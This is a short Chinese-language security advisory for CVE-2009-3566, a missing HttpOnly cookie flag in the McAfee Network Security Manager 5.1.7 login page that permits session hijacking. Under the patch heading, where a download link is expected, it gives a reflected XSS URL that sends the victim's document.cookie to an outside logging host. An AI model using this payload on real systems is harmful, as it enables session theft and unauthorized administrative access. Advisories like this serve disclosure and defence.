BUGTRAQ ID: 37004
CVE ID: CVE-2009-3566
McAfee Network Security Manager是一款功能强大的入侵防护解决方案。
当用户加载Network Security Manager管理控制台的登录页面时服务端会在执行认证之前在浏览器中设置Cookie。由于没有设置HttpOnly标记,客户端的 JavaScript也可以访问这个Cookie,因此任何可以访问这个Cookie的攻击者都可以通过劫持会话绕过认证,获得对Network Security Manager的管理访问。
0
McAfee Network Security Manager 5.1.7 7
厂商补丁:
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
https://x.x.x.x/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=&iaction=precreatefcb14%22%3E%3Cscript%3Enew%20Image().src=%22http://x.x.x.x/mcafee/log.cgi?c=%22%2BencodeURI(document.cookie);%3C/script%3E8b3283a1e57